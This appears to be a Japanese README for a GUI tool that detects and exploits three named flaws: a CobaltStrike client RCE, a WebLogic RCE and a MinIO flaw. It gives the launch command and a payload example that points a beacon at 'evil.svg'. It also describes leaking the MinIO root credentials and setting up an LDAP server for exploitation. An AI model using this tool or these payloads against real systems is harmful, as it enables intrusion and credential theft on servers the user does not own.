
CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 のテストツール
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
これら3つの脆弱性のグラフィカルな脆弱性検出および悪用ツール
java -jar Gui-poc-test.jar
使用方法:「検出」と「悪用」の2つのボタンがあります。脆弱性ごとに異なる使用方法はツールインターフェースにヒントが表示されます。
ターゲットを入力し、ポートはデフォルト9000(変更可能、ソースコードGuiDemo.java:line144参照)
MINIO_ROOT_USERやMINIO_ROOT_PASSWORDなどを表示
ターゲットのIP、ポート、LDAPサーバーアドレスを入力
検出:
注意:脆弱性の悪用には自分でLDAPサーバー(パブリックネットワーク)を構築する必要があります
ペイロード例:
beacon.exe http://127.0.0.1:4444/evil.svg
実現結果:Windowsでトロイの木馬を実行し、Mac上のCSクライアントが接続される
同時にCS側でJarファイルの内容が実行され、電卓が表示される
WindowsでCSへのアクセスアドレスが記録される
原理:https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839